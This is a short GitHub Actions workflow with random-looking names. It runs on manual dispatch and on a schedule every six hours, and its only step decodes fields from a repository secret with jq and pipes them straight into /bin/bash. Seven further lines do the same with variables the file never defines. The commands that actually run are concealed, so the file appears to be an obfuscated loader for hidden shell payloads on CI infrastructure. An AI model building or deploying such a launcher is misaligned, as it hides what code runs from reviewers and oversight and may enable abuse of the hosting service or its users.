name: liuzhuanxxo

on:
  workflow_dispatch:
  schedule:
    - cron: '29 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liuzhuanxxo
        env:
          dhqad29: ${{ secrets.dhqad29 }}
        run: |
          echo $dhqad29 | jq -r .z332 | /bin/bash
          echo $p76303 | jq -r .sqtgc15 | /bin/bash
          echo $ahwhe7 | jq -r .t97 | /bin/bash
          echo $wzzym5905 | jq -r .uvmn6 | /bin/bash
          echo $mb43070 | jq -r .r0960 | /bin/bash
          echo $pr82 | jq -r .in83952 | /bin/bash
          echo $abw13 | jq -r .dl26 | /bin/bash
          echo $eaw54999 | jq -r .fz45 | /bin/bash

